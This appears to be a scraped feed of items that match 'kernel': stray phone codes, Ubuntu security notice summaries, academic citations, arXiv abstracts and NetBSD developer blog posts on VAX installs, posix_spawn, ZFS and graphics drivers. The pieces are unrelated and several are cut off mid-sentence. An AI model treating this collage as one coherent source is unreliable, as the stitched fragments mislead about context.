*#9125# : Activates the smiley when charging.
*#0001# : Show Serial Parameters

          [Bug 11742] 64 bit builds show a kernel warning for CONFIG_X86_BIGSMP   

          uisp-20050207-alt2   
uisp-20050207-alt2  build (NMU) Aleksei Nikiforov, 29 June 2017, 12:32

Maintainer: Evgeny Sinelnikov
Group: System/Kernel and hardware
Summary: Universal In-System Programmer for Atmel AVR and 8051
Changes:
- Updated spec to allow any compression of man page
          Ubuntu Security Notice USN-3345-1   
Ubuntu Security Notice 3345-1 - USN 3324-1 fixed a vulnerability in the Linux kernel. However, that fix introduced regressions for some Java applications. This update addresses the issue. Roee Hay dis ... - Source: packetstormsecurity.com
          Ubuntu Security Notice USN-3344-2   
Ubuntu Security Notice 3344-2 - USN-3344-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement kernel from ... - Source: packetstormsecurity.com
          Ubuntu Security Notice USN-3344-1   
Ubuntu Security Notice 3344-1 - USN 3328-1 fixed a vulnerability in the Linux kernel. However, that fix introduced regressions for some Java applications. This update addresses the issue. Roee Hay dis ... - Source: packetstormsecurity.com
          Ubuntu Security Notice USN-3342-1   
Ubuntu Security Notice 3342-1 - USN 3326-1 fixed a vulnerability in the Linux kernel. However, that fix introduced regressions for some Java applications. This update addresses the issue. It was disco ... - Source: packetstormsecurity.com
          Ubuntu Security Notice USN-3343-1   
Ubuntu Security Notice 3343-1 - USN 3335-1 fixed a vulnerability in the Linux kernel. However, that fix introduced regressions for some Java applications. This update addresses the issue. It was disco ... - Source: packetstormsecurity.com
          Ubuntu Security Notice USN-3343-2   
Ubuntu Security Notice 3343-2 - USN 3343-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement kernel from ... - Source: packetstormsecurity.com
          Ubuntu Security Notice USN-3338-2   
Ubuntu Security Notice 3338-2 - USN-3338-1 fixed vulnerabilities in the Linux kernel. However, the fix for CVE-2017-1000364 introduced regressions for some Java applications. This update addresses the ... - Source: packetstormsecurity.com
           Application of string kernels in protein sequence classification    
Zaki, Nazar M. and Deris, Safaai and Illias, Rosli Md (2005) Application of string kernels in protein sequence classification. Applied Bioinformatics, 4. pp. 45-52. ISSN 1175-5636
           The Riemann-Hilbert problem and the generalized Neumann kernel    
Wegmann, R. and Murid, A. H. M. and Nasser, M. M. S. (2005) The Riemann-Hilbert problem and the generalized Neumann kernel. Journal of Computational and Applied Mathematics, 182. pp. 388-415. ISSN 0377-0427
          A Deep Learning Performance Lens for Low Precision Inference   

Few companies have provided better insight into how they think about new hardware for large-scale deep learning than Chinese search giant, Baidu.

As we have detailed in the past, the company’s Silicon Valley Research Lab (SVAIL) in particular has been at the cutting edge of model development and hardware experimentation, some of which is evidenced in their publicly available (and open source) DeepBench deep learning benchmarking effort, which allowed users to test different kernels across various hardware devices for training.

Today, Baidu SVAIL extended DeepBench to include support for inference as well as expanded training kernels.

A Deep Learning Performance Lens for Low Precision Inference was written by Nicole Hemsoth at The Next Platform.


           Palm kernel oil leaching    
Morad, Noor Azian and Abdul Aziz, Mustafa Kamal and Sabri, Abu Safian and Ismail, Buliam (1989) Palm kernel oil leaching. Proceedings of The Fifth Symposium Of Malaysian Chemical Engineers . pp. 432-442.
          Autotuning GPU Kernels via Static and Predictive Analysis. (arXiv:1701.08547v3 [cs.DC] UPDATED)   

Authors: Robert V. Lim, Boyana Norris, Allen D. Malony

Optimizing the performance of GPU kernels is challenging for both human programmers and code generators. For example, CUDA programmers must set thread and block parameters for a kernel, but might not have the intuition to make a good choice. Similarly, compilers can generate working code, but may miss tuning opportunities by not targeting GPU models or performing code transformations. Although empirical autotuning addresses some of these challenges, it requires extensive experimentation and search for optimal code variants. This research presents an approach for tuning CUDA kernels based on static analysis that considers fine-grained code structure and the specific GPU architecture features. Notably, our approach does not require any program runs in order to discover near-optimal parameter settings. We demonstrate the applicability of our approach in enabling code autotuners such as Orio to produce competitive code variants comparable with empirical-based methods, without the high cost of experiments.


          Time Series Cluster Kernel for Learning Similarities between Multivariate Time Series with Missing Data. (arXiv:1704.00794v2 [stat.ML] UPDATED)   

Authors: Karl Øyvind Mikalsen, Filippo Maria Bianchi, Cristina Soguero-Ruiz, Robert Jenssen

Similarity-based approaches represent a promising direction for time series analysis. However, many such methods rely on parameter tuning, and some have shortcomings if the time series are multivariate (MTS), due to dependencies between attributes, or the time series contain missing data. In this paper, we address these challenges within the powerful context of kernel methods by proposing the robust \emph{time series cluster kernel} (TCK). The approach taken leverages the missing data handling properties of Gaussian mixture models (GMM) augmented with informative prior distributions. An ensemble learning approach is exploited to ensure robustness to parameters by combining the clustering results of many GMM to form the final kernel.

We evaluate the TCK on synthetic and real data and compare to other state-of-the-art techniques. The experimental results demonstrate that the TCK is robust to parameter choices, provides competitive results for MTS without missing data and outstanding results for missing data.


          Unbloating the VAX install CD   
A recent discussion on the port-vax mailing list brought a problem with the default installation method (when booting from CD, which typically is the easiest way) to my attention: it would not work on machines with 16 MB RAM or less.

So, can we do better? Looking at the size of a GENERIC kernel:

   text    data     bss     dec     hex filename
2997389   67748  173044 3238181  316925 netbsd
it seems we cannot easily go below 4 MB (and for other reasons we would need to compile the bootloader differently for that anyway). But 16 MB is still quite a difference, so it should work.
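As a quick sanity check, the columns in that size(1) output add up exactly (a trivial calculation, shown here in Python):

```python
# Recompute the kernel's static memory footprint from the size(1) output above.
text, data, bss = 2997389, 67748, 173044

total = text + data + bss
assert total == 3238181          # matches the "dec" column
assert hex(total) == "0x316925"  # matches the "hex" column

# Roughly 3.1 MiB resident before any dynamically allocated kernel memory,
# which is why a floor of around 4 MB for the whole system is plausible.
print(total / (1024 * 1024))
```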

Now, at the time I started this quest, I only had one real VAX machine - a VAXstation 4000 M96a, one of the fastest models and, with 128 MB RAM, well equipped. This is nice if you try to natively compile modern gcc, but I did not feel like fiddling with my hardware to create a better test environment for small-RAM installations.

As it did about a year ago, when I fixed the VAX primary boot blocks (with lots of help from various vaxperts on the port-vax mailing list), SIMH, found in pkgsrc as emulators/simh, proved helpful. Testing various configurations, I found an emulated VAX 11/780 with 8 MB to be the smallest I could get working.

The first step of the tuning was obvious: the CD image used a ramdisk-based kernel, with the ramdisk containing all of the install system. At the same time, most of the CD was unused. We already use different schemes on i386, amd64 and sparc64 - so I cloned the sparc64 one and adjusted it to VAX. Now we use the GENERIC kernel on CD and mount the ISO9660 filesystem on the CD itself as the root file system. The VAX boot loader could already deal with this; only a minor fix was needed for the kernel to recognize some variants of CD drives as a boot device.

The resulting CD did boot, but did not get far in userland. The CD only contained a (mostly) empty /dev directory (without /dev/console), which causes init(8) to mount a tmpfs on /dev and run the MAKEDEV script there. But to my surprise, on the 11/780 mfs was used instead of tmpfs - and we will see why soon. The next step in preparing the userland for the installer is creating additional tmpfs instances to deal with the read-only nature of the CD used as root. This did not work at all: the mount attempts simply failed, and the installer was very unhappy, as it could not create files in /tmp, for example.

I checked, and tmpfs was part of the VAX GENERIC kernel. I tried the install CD on a simulated MicroVAX 3900 with 64 MB of RAM - and to my surprise all of /dev and the three additional tmpfs instances created later worked (as did the installation procedure). I checked the source (stupid me) and then found the documentation: tmpfs reserved a hard-coded 4 MB of RAM for the system. With the GENERIC kernel booted on an 8 MB machine, we had slightly less than 4 MB RAM free, so tmpfs never worked.

One step back - this explained why /dev ended up as an mfs instead of a tmpfs. The MAKEDEV code is written to deal with kernels that include tmpfs, but also with those that do not: it tries tmpfs, and falls back to mfs if that does not work. This made me think I could do the same (but without even trying tmpfs): I changed the install CD scripts to use mfs instead of tmpfs. The main difference is that mfs uses a userland process to manage the swappable memory. However, we do not have any swap space yet. Checking when sysinst enables swapping for the first time, I found: it never did on VAX. Duh! I added the missing calls to the machine-dependent code in sysinst, but of course the installer can only enable swap after partitioning is done (and a swap partition has been created).

Testing showed: we did not get far enough with four mfs instances. So let us try with fewer. One we do not need is the /dev one: I changed the CD content creation code to pre-populate /dev on the CD. This is not possible with all filesystems, including the original ISO9660 one, but with the so-called Rockridge Extensions it works. We know that it is a modern NetBSD kernel mounting the CD - so support for those extensions is always present. I made some errors and hit some bugs (that got fixed) on the way there, but soon the CD booted without creating a mfs (nor tmpfs) for /dev.

Still, three mfs instances did not survive until sysinst enabled swapping. The userland part was killed once the kernel ran out of memory. I needed tmpfs working with less than 4 MB of memory free. After a slight detour and some discussion on the tech-kern mailing list, I changed tmpfs to reserve only a dynamically scaled amount of memory, calculated by the UVM memory management. With this change, a current install CD just works, and the installation completes successfully.
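The effect of the change can be sketched abstractly. The numbers, function names, and scaling fraction below are illustrative only, not the actual NetBSD tmpfs code: the old behaviour reserved a fixed 4 MB regardless of machine size, while the new behaviour scales the reservation with what is actually free.

```python
# Illustrative sketch only - not the real sys/fs/tmpfs code.
# Old behaviour: a hard-coded 4 MB reserve, so a tmpfs mount fails
# outright whenever less than 4 MB is free.
FIXED_RESERVE = 4 * 1024 * 1024

def tmpfs_can_mount_old(free_bytes):
    return free_bytes > FIXED_RESERVE

def tmpfs_can_mount_new(free_bytes, fraction=0.25):
    # New behaviour (schematically): reserve a dynamically scaled amount
    # derived from what the VM system reports as free, so small machines
    # still get a usable tmpfs.
    reserve = int(free_bytes * fraction)
    return free_bytes - reserve > 0

# "avail memory" reported by the 8 MB test machine was 3884 KB,
# just under the old fixed reserve - hence the observed failures.
small_machine_free = 3884 * 1024
print(tmpfs_can_mount_old(small_machine_free),
      tmpfs_can_mount_new(small_machine_free))
```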

The following is just the start of the installation process, the sysinst part afterwards is standard stuff and left out for brevity.

Copyright (c) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005,
    2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014                 
    The NetBSD Foundation, Inc.  All rights reserved.   
Copyright (c) 1982, 1986, 1989, 1991, 1993           
    The Regents of the University of California.  All rights reserved.
                                                                      
NetBSD 6.99.43 (GENERIC) #1: Thu Jun  5 22:01:14 CEST 2014
        martin@night-owl.duskware.de:/usr/obj/vax/usr/src/sys/arch/vax/compile/GENERIC
VAX 11/780
total memory = 8188 KB
avail memory = 3884 KB
mainbus0 (root)       
cpu0 at mainbus0: KA80, S/N 1234(0), hardware ECO level 7(112)
cpu0: 4KB L1 cachen, no FPA                                   
sbi0 at mainbus0           
mem0 at sbi0 tr1: standard
mem1 at sbi0 tr2: standard
uba1 at sbi0 tr3: DW780   
dz1 at uba1 csr 160100 vec 304 ipl 15
mtc0 at uba1 csr 174500 vec 774 ipl 15
mscpbus0 at mtc0: version 5 model 5   
mscpbus0: DMA burst size set to 4  
uda0 at uba1 csr 172150 vec 770 ipl 15
mscpbus1 at uda0: version 3 model 6   
mscpbus1: DMA burst size set to 4  
de0 at uba1 csr 174510 vec 120 ipl 15: delua, hardware address 08:00:2b:cc:dd:ee
mt0 at mscpbus0 drive 0: TU81                                                  
mt1 at mscpbus0 drive 1: TU81
mt2 at mscpbus0 drive 2: TU81
mt3 at mscpbus0 drive 3: TU81
ra0 at mscpbus1 drive 0: RA92
ra1 at mscpbus1 drive 1: RA92
racd0 at mscpbus1 drive 3: RRD40
ra0: size 2940951 sectors       
ra1: no disk label: size 2940951 sectors
racd0: size 1331200 sectors             
boot device: racd0         
root on racd0a dumps on racd0b
root file system type: cd9660 
init: kernel secur           

You are using a serial console, we do not know your terminal emulation.
Please select one, typical values are:

        vt100
        ansi
        xterm

Terminal type (just hit ENTER for 'vt220'): xterm
                                                                                
 NetBSD/vax 6.99.43                                                             
                                                                                
 This menu-driven tool is designed to help you install NetBSD to a hard disk,   
 or upgrade an existing NetBSD system, with a minimum of work.                  
 In the following menus type the reference letter (a, b, c, ...) to select an   
 item, or type CTRL+N/CTRL+P to select the next/previous item.                  
 The arrow keys and Page-up/Page-down may also work.                            
 Activate the current selection from the menu by typing the enter key.          


                +---------------------------------------------+
                |>a: Installation messages in English         |
                | b: Installation auf Deutsch                 |
                | c: Mensajes de instalacion en castellano    |
                | d: Messages d'installation en français      |
                | e: Komunikaty instalacyjne w jezyku polskim |
                +---------------------------------------------+

Overall this improved how NetBSD deals with small-memory systems. The VAX-specific install changes can be brought over to other ports as well, but sometimes changes to the bootloader will be needed.
          First ports switched to gcc 4.8   
After several months of preparation, the first ports (hppa, sparc and sparc64) have switched their compiler to gcc version 4.8 today. Amd64 and i386 should follow soon.

Work is ongoing to bring this modern toolchain to all other ports too (most of them already work, but some more testing will be done). If you want to try it, just add -V HAVE_GCC=48 to the build.sh invocation.

Note that in parallel clang is available as an alternative option for a few architectures already (i386, amd64, arm, and sparc64), but needs more testing and debugging at least on some of them (e.g. the sparc64 kernel does not boot).

For a project with diverse hardware support like NetBSD, all toolchain updates are a big pain - so a big THANK YOU! to everyone involved; in no particular order Christos Zoulas, matthew green, Nick Hudson, Tohru Nishimura, Frank Wille (and myself).


          Google Summer of Code 2013 report: Defragmentation for FFS   

The following report is by Manuel Wiesinger:

First of all, I would like to thank the NetBSD Foundation for enabling me to successfully complete this Google Summer of Code. It has been a very valuable experience for me.

My project is a defragmentation tool for FFS. I want to point out at the beginning that it is not ready for use yet.

What has been done:

Fragment analysis + reordering. When a file is smaller than or equal to the file system's fragment size, it is stored as a fragment. One can think of a fragment as a small block. Many small files can each occupy a fragment, and as the file system changes over time, many blocks can end up containing fewer fragments than they could hold. The optimization my tool does is to pack all these fragments into fewer blocks. This way the system may gain a little more free space.
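The packing strategy amounts to simple bin packing. The sketch below illustrates the idea only - the fragments-per-block ratio and data layout are assumptions for the example, not the tool's actual code:

```python
# Illustrative first-fit-decreasing packing of partially filled blocks.
# Each block holds up to FRAGS_PER_BLOCK fragments; the input is the
# number of live fragments in each partially used block.
FRAGS_PER_BLOCK = 8  # e.g. an 8 KB block with a 1 KB fragment size

def pack_fragments(block_fill_counts):
    """Repack fragment groups into as few blocks as possible."""
    packed = []  # fragments used in each output block
    for count in sorted(block_fill_counts, reverse=True):
        for i, used in enumerate(packed):
            if used + count <= FRAGS_PER_BLOCK:
                packed[i] += count  # fits into an existing block
                break
        else:
            packed.append(count)    # needs a fresh block
    return packed

# Five half-empty blocks collapse into two, freeing three whole
# blocks for the file system.
before = [3, 2, 5, 1, 4]
after = pack_fragments(before)
print(before, "->", after)
```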

Directory optimization. When a directory gets deleted, the space for that directory and its name are appended to the previous directory. This can be imagined like a linked list. My tool reads that list and writes all entries sequentially.

Non-contiguous files analysis + reordering strategy. This is what most other operating systems call defragmentation - a reordering of blocks, so that blocks belonging to the same file or directory can be read sequentially.
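The reordering itself can be pictured as relocating a file's scattered blocks into one contiguous free run. This is a sketch of the general idea under a toy disk model, not the tool's implementation:

```python
# Illustrative defragmentation of one file: move its scattered blocks
# into a single contiguous run of free blocks. The "disk" is modelled
# as a list of block owners, with None marking a free block.
def defragment_file(disk, file_id):
    need = sum(1 for b in disk if b == file_id)
    # Find the first contiguous run of free blocks large enough.
    run_start, run_len = None, 0
    for i, owner in enumerate(disk):
        if owner is None:
            run_start = i if run_len == 0 else run_start
            run_len += 1
            if run_len == need:
                break
        else:
            run_len = 0
    if run_len < need:
        raise RuntimeError("not enough contiguous free space")
    # Vacate the old locations, then place the blocks into the run in order.
    new_disk = [None if b == file_id else b for b in disk]
    for j in range(need):
        new_disk[run_start + j] = file_id
    return new_disk

fragmented = ["A", "B", None, None, None, "A", "B", "A"]
compacted = defragment_file(fragmented, "A")
print(compacted)
```

Note this simple version needs a free run at least as large as the file, which is exactly the limitation the author mentions later under "What there is to do technically".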

What did not work as expected

Testing: I thought the most productive and stable approach would be to work with unit tests - strictly test-driven development - but playing around with rump/atf was not really effective. Still, I always started a new implementation step by generating a file system in a state where it could be optimized, then wrote the scripts and checked whether they did what I intended (of course, they did not always).

I'm a bit disappointed about the amount of code. But as I said before, the hardest part was figuring out how things work. For its size, the code does relatively much - I expected more lines of code would be needed to get where I am now.

Before applying for this project, I took a close look at UFS. But it was not close enough - there were many surprises. E.g. I had no idea that files contain gaps on purpose, to exploit the rotation of hard disks.

Time management: everything took longer than I expected, mostly because it was really hard to figure out how things work. Lacking documentation is a huge problem too.

Things I learned

A huge lesson in software engineering: things always turn out differently than expected if you do not have a lot of experience.

I feel more confident reading and patching kernel code. All my previous experiences were not so in-depth (e.g., I worked with Pintos). The (mental) barrier of kernel/system programming is gone. For example, I now see a chance to take a look at ACPI and see if I can write a patch to get suspend working on my notebook.

I got more contact with the NetBSD community, and got a nice overview of how things work. The BSD community here is very mixed; there are not many NetBSD people.

CVS is better than most of my friends say.

I learned about pkgsrc, UVM, and other smaller things about NetBSD too, but that's not worth mentioning in detail.

How I intend to continue:

After a sanity break from the whole project, there are several possibilities.

In the next days I will speak to a supervisor at my university about whether I can continue the project as a project thesis (I still need to do one). It may even include online defragmentation, based on snapshots. That's my preferred option.

I definitely want to finish this project, since I spent so much time and effort. It would be a shame otherwise.

What there is to do technically

Defragmentation currently works only given enough free space to move a file. I want to find a way to defragment even when there is too little space. This can be achieved by moving blocks piece by piece, using the file's own space as 'free space'.

Online defragmentation. I already skimmed how snapshots work. It should be possible.

Improve the tests.

It should be easy to get this compiling on older releases. Currently it compiles only on -current.

In the long run, it is probably worth porting the tests to atf/rump.

Conclusion

I will continue to work, and definitely continue to use and play with NetBSD! :)

It's a stupid thing that a defrag tool is worth little (nothing?) on SSDs. But since NetBSD is designed to run on (almost) any hardware, this does not bug me a lot.

Thank you NetBSD! Although it was a lot of hard work. It was a lot of fun!

Manuel Wiesinger


          posix_spawn syscall added   

Charles Zhang implemented the posix_spawn syscall during Google Summer of Code 2011. After a lot of polishing and rework based on feedback during public discussion of the code, this has now been committed to NetBSD-current.

This caused some fallout and ended in a tight race with the imminent branch date for NetBSD 6. Now that the dust has settled, it is time for a look back at the mistakes made and lessons learned.

What is posix_spawn?

Traditionally BSD systems used the vfork(2) hack to improve the speed of process creation. However, this does not (in general) play well with multi-threaded applications. The posix_spawn call is a thread-safe way to create new processes and manipulate a tiny bit of state (like dup/close/open file descriptors) upfront.
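Python's os module wraps the same interface (since Python 3.8), which makes the descriptor manipulation easy to illustrate. In this minimal sketch, the file action opens a file onto the child's stdout before exec - the kind of setup posix_spawn handles without an intermediate fork:

```python
import os
import sys
import tempfile

# Demonstrate posix_spawn-style descriptor setup via Python's wrapper.
out_path = os.path.join(tempfile.mkdtemp(), "spawn-out.txt")

# In the child, before exec: open out_path and place it on fd 1 (stdout).
file_actions = [
    (os.POSIX_SPAWN_OPEN, 1, out_path,
     os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600),
]

pid = os.posix_spawn(
    sys.executable,
    [sys.executable, "-c", "print('hello from the child')"],
    os.environ,
    file_actions=file_actions,
)
_, status = os.waitpid(pid, 0)
```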

Work continued after GSoC

The results Charles had at the end of his GSoC term were a working in-kernel implementation of posix_spawn and a few free-form test cases, one of which failed. The kernel code duplicated a lot of other code, which clearly was not acceptable for commit to the NetBSD source tree. The reason Charles solved it this way was the short time frame available - and that the best solution we could think of during the summer was very intrusive.

In preparation for a potential merge into the NetBSD code base, I reworked the code to avoid copying helper functions (like file descriptor manipulations for other processes), cleaned up and debugged a bit using a LOCKDEBUG kernel, which pointed out a few more issues. After solving those as well as intensively testing all error paths, I posted a patch for review.

At this point the integration was already completely prepared - a new syscall, new libc functions and new manual pages need a lot of set-list updates and at least one test build of a "release" (preferably on an architecture providing 32-bit compat libraries); furthermore, the posix_spawn code needed (simple) machine-dependent code to be added to all architectures, which at least requires test-building a representative set of kernels.

Another complete rework

In response to the posted, very intrusive, patch, YAMAMOTO Takashi suggested a pretty elegant way to solve the problem without a lot of the intrusive changes. The idea was simple, and it actually worked after a few adjustments. This led to another public patch for review.

This version already included an atf version of the test programs, which all passed (both on amd64 and sparc64). I felt pretty confident with this state and expected a smooth integration.

Unexpected fallout

More for completeness I did a full test run (not only the posix_spawn related tests) - and found some unexpected test failures, all in rump based tests. I retried and got different failures. Suspicious - I did not touch rump, besides regenerating the syscall definitions. I rebooted a standard kernel (without posix_spawn), did a full test run and only got failures in the posix_spawn tests (of course). So something in the change must have broken something else.

Analysis was a painful process, so here is only a short summary of the results: the modified kernel exec path used a pointer to a kernel stack variable, which was later copied to a saved data structure - but the pointer was not adjusted accordingly. Later the pointer was dereferenced and only a single bit checked. Depending on what was in memory at the stale old stack location at that time, a branch was taken or not. This caused the ELF auxiliary data vector to sometimes contain a different effective UID, and ld.elf_so to switch into secure mode - in which case it ignores environment variables like LD_PRELOAD. This caused big failures in many test programs using rump (at least).

While I was debugging this, discussions continued. We were not sure if we should add complex code like this to the kernel, when a pure userland implementation clearly is possible (FreeBSD uses one, for example). I did a few benchmark runs, but was unable to show any clear performance benefit for either implementation - the differences were in the sub-per-mille range, with noise in the 2-3 percent range: clearly no usable result from a statistical point of view. Another topic under discussion was the approaching planned branch for NetBSD 6. According to our rules, we do not want to add a syscall to a release branch post-branch.

Go ahead, finally!

The discussions ended with the core team voting for a kernel version, and the release engineering team voting for a pre-netbsd-6-branch integration. So I updated my posix_spawn source tree, did another test build, ran tests (again on amd64 and sparc64), updated again - and committed in a few steps.

Big fallout

Checking mail early the next morning (a Sunday, before walking the dog) I found a PR already: running the m4 configure script crashed i386 and amd64 kernels. Tsutsui had kindly provided a backtrace in the report, and it looked suspiciously familiar to me. While walking the dog I thought about it, and when I got home I checked: indeed I had seen and fixed this before, when testing error paths in the first instance of the change. However, when dropping all the intrusive modifications I had in my tree and redoing the version without them, I must have accidentally dropped the fix for this (it was in sys/uvm instead of sys/kern). No big deal - I had fixed it once already, so I could fix it again. Committed, asked for verification - and got a NAK. However, with a different backtrace this time. Tried on my amd64 notebook - worked for me. Duh?

Looking at the code, fixing the second fallout was now straightforward, and it also provided the hint why I had not seen it before: I was not running a GENERIC kernel on my notebook, and had (some time way back in the past) removed options DIAGNOSTIC from its configuration. Stupid me!

I received more feedback (YAMAMOTO-san pointed out some race conditions) and had a discussion about the place where the test programs should live in the source. To not risk delaying the netbsd-6 branch, I applied a minimal fix for the races, moved the test programs - and added a few more test cases covering the initial m4 configure problems (the rework earlier had made it pretty simple now to test all error paths from atf test cases).

This caused the automatic test setup to crash on every run ("Tests did not complete"). At this point I am still not sure why I did not catch this before the commit - but there is no point in arguing; human failure, my fault. (The most likely explanation: after the last changes to the test cases, I tested again only on sparc64, not amd64 - the test cases triggered a KASSERT in the x86 pmap, but not in the sparc64 one.)

I fixed this, and also another PR - interestingly, about m4 configure again. A simple argument-validation bug, not yet covered by the test cases - so I added another test.

Are we there yet?

Luckily fallout seems to have stopped now, but we are not completely there yet. The new process created by posix_spawn keeps the parent lwp blocked until it is done with all file descriptor modifications and setup, and the new process is ready to go to userland first time. This provides a proper error return value from the parent (the posix_spawn syscall itself), but it stops the new child from (for example) already running on another CPU early. This will be simple to change, but after all the fallout we have seen, I will only touch it after very extensive testing again.

Lessons learned

When bringing in a new syscall with several supporting libc functions, fallout is always to be expected. It can be minimized by including test programs early - but in the end, real life will teach you which tests you missed when writing them. It is also important to do full test-suite runs early, and to test on different architectures - even better if you test on kernels with (at least) DIAGNOSTIC enabled. But in the end, mistakes will happen nevertheless.


          Portable C Compiler   

After reading about progress with the Portable C Compiler (PCC) last year, I was inspired to try building it on NetBSD. Gregory McGarry had done some work integrating it into the toolchain, though it is not yet usable to build a full release, and the native build framework in external/bsd/pcc was incomplete.

I updated this a while ago so that it is possible to build a distribution or release containing pcc(1), pcpp(1) and ccom(1) binaries for the target architecture by setting the following two variables in your /etc/mk.conf or passing them to build.sh on the command line:

    MKPCC=yes
    MKPCCCMDS=yes

There have been many bug fixes and features added since the previous import in September 2009, but the major addition is that GCC compatibility is now enabled by default, and many commonly used attributes and builtin functions are now supported. I had heard of people trying (without success) to use pcc to build a kernel, and went for an alternative approach - building userland programs - as my feeling was that testing smaller code units would be a lot easier. I wrote a script (src/external/bsd/pcc/prepare-import.sh) to configure the PCC sources for import into NetBSD in a consistent manner, and have been using it to follow development for a few months, reporting problems along the way where I could.

The latest pcc can build all of bin/ and sbin/, most of games/ (except for dab(6) which is C++), and only a few issues remain in usr.bin/ and usr.sbin/. There are still issues outstanding with PIC support on i386 at least, which prevents building shared libraries within the NetBSD framework at this time, though this can be worked around by setting MKPIC=no.

The in-tree version has been updated and is now at "pcc 0.9.9 [20100603]", which I've been using successfully on i386; support is also included for amd64, arm, hppa, mips, powerpc, sparc64 and vax CPUs, which may work as well.

All the credit and many thanks go to Anders Magnusson, who has been working on pcc for many years; he is very responsive to problem reports, sometimes posting fixes the same day.


          Kernel Modules Autoload from Host in Rump   

Since early 2009, NetBSD and rump have supported execution of stock kernel module binaries in userspace on x86 architectures. Starting in -current as of today, kernel modules will automatically be loaded from the host into the rump kernel. For example, when mounting a file system in a rump kernel, support will be loaded automatically before mounting is attempted.

The first issue with autoloading host kernel modules in rump was kernel symbol renaming: to prevent collisions between the application and kernel C symbols, the rump build uses objcopy to prefix symbols with the string rumpns. While running objcopy on a prebuilt kernel module was possible without access to the module's source code, it was a manual step necessary to get a standard kernel module loaded. This was solved by adding a hook to the module loader to adjust the module's string table after it is loaded but before it is linked.

The second issue was that kernel modules had to be loaded manually by calling rump_sys_modctl(); in contrast kernel modules are commonly autoloaded when necessary. While the standard kernel routines included in a rump kernel would attempt to autoload the module, they would fail because the module files were not available within the rump file system namespace. With some improvements to the rump host file system, etfs, it is now possible to map the kernel module directory (e.g. /stand/i386/5.99.27/modules) inside the rump kernel.

Autoloading kernel modules from the host demonstrates a key feature and difference of rump-style lightweight service virtualization: only one full host installation is necessary (although the coexistence of multiple different rump kernel versions is of course possible). This should be contrasted with traditional heavyweight approaches to building virtual services, where each virtual service requires an entire OS installation and maintenance.


          Summer of code results: NetBSD zfs port   

Overview

This summer I worked on a port of the ZFS file system to NetBSD, mentored by Andrew Doran. This entry details the results of my Summer of Code project and future plans.

Goals

During this year's Summer of Code I worked on a port of the ZFS file system to NetBSD. Before the midterm we wanted to have loadable zfs and solaris modules, with eventually a working zvol. After the midterm we wanted to look at the zfs file system itself and try to port the Solaris VFS and vnode operations to NetBSD. Porting zfs snapshots and ZFS ACL management was set as an optional task.

Results

I was able to successfully complete all midterm and end-term tasks. After GSoC we were able to successfully mount, and compile a new kernel on, a zfs file system. Our work was merged into the HEAD branch of the NetBSD base system before the end of GSoC. It is built by default for the amd64 and i386 architectures; however, only i386 is functional now. There are still integration problems, and zfs can deadlock very easily during vnode reclaim or fsync.

I'm willing to continue my work after the import. More details about the usage of ZFS under NetBSD can be found in the ZFS TODO. There are still many open issues with ZFS:

  • Fix amd64 panic during zvol creation
  • Fix vnode lifecycle related deadlocks in zfs
  • Fix problems with file permissions on a zfs filesystem
  • Add native getpages and putpages routines for zfs
  • Port the zfs snapshots layer
  • Update zfs code to newer version
  • Add support for exporting zfs volumes as iSCSI targets

          Summer of Code results: GPT-aware boot loader support   

Overview

I mentored NetBSD developer Mike Volokhov for this year's successful Google Summer of Code project titled "GPT-aware boot loader support."

Goals and Results

GPT is an acronym for GUID Partition Table (and GUID is an acronym for Globally-Unique IDentifier). This type of partition table was introduced as part of the Extensible Firmware Interface (EFI) standard proposed by Intel and originally found on Intel's IA64- (Itanium-)based systems. Many x86-based operating systems now create and manage disks using GPTs since they are much more robust and flexible than the traditional PC's Master Boot Record (MBR) method.

Most PCs, however, still use a traditional BIOS (not EFI) to boot, so while you can use a GPT to partition a disk, it's tricky to boot from it. That's where this project comes in. The project's primary goal was to develop and demonstrate a system for booting from a GPT-partitioned disk on a system with a traditional PC BIOS. He did this by developing a new boot block that's aware of the GPT, adapting the FAT-based boot loader for use in an EFI system partition, and enhancing the second-stage loader to load the kernel and modules from a GUID partition.

The work isn't yet integrated, but Mike is planning on developing it further and bringing it into the system. When it's fully integrated, i386 and amd64 systems will be able to use either traditional MBR- or GPT-formatted disks as boot disks. Please visit his web page at http://www.NetBSD.org/~mishka/gptboot/ for more details, code, caveats, and instructions for trying it out! Feedback and improvements are welcome!


          The state of accelerated graphics on NetBSD/sparc   

Now that NetBSD/sparc has switched to wscons in -current, it can finally run the Xorg X server out of the box. This means we will support accelerated graphics in X and on the kernel console on a lot more hardware than before with Xsun and friends, namely:

  • Sun CG3 - has kernel support and works in X with the wsfb driver, the hardware doesn't support a hardware cursor or any kind of acceleration so we won't bother with a dedicated X driver. The hardware supports 8 bit colour only.
  • Sun CG6 family, including GX, TGX, XGX and their plus variants - supported with acceleration in both the kernel and X with the suncg6 driver. Hardware cursor is supported, the hardware supports 8 bit colour only.
  • Sun ZX/Leo - has accelerated kernel support but no X yet. The sunleo driver from Xorg should work without changes but doesn't support any kind of acceleration yet. The console runs in 8 bit, X will support 24 bit.
  • Sun BW2 - has kernel support, should work with the wsfb driver in X. This is untested, the board doesn't support a hardware cursor or any kind of acceleration. Hardware is monochrome only.
  • Weitek P9100 - found in Tadpole SPARCbook 3 series laptops, supported with acceleration in both the kernel and X with the pnozz driver. Hardware cursor is supported. The console runs in 8 bit, X can run in 8, 16 or 24 bit colour.
  • Sun S24/TCX - supported with acceleration in both the kernel and X with the suntcx driver. A hardware cursor is supported; support for 8-bit-only boards is untested for lack of hardware. The console runs in 8 bit, X in 24 bit.
  • Sun CG14 - supported without acceleration in both the kernel and X for total lack of documentation for the SX rendering engine. We do support a hardware cursor with the wsfb driver though. The console runs in 8 bit, X in 24 bit.
  • Fujitsu AG-10e - supported with acceleration in both the kernel and X, a hardware cursor is supported. The console runs in 8 bit, X in 24 bit.
  • IGS 1682 found in JavaStation 10 / Krups - supported, but the chip lacks any acceleration features. It does support a hardware cursor though, which the wsfb driver can use. Currently X is limited to 8 bit colour although the hardware supports up to 24 bit.

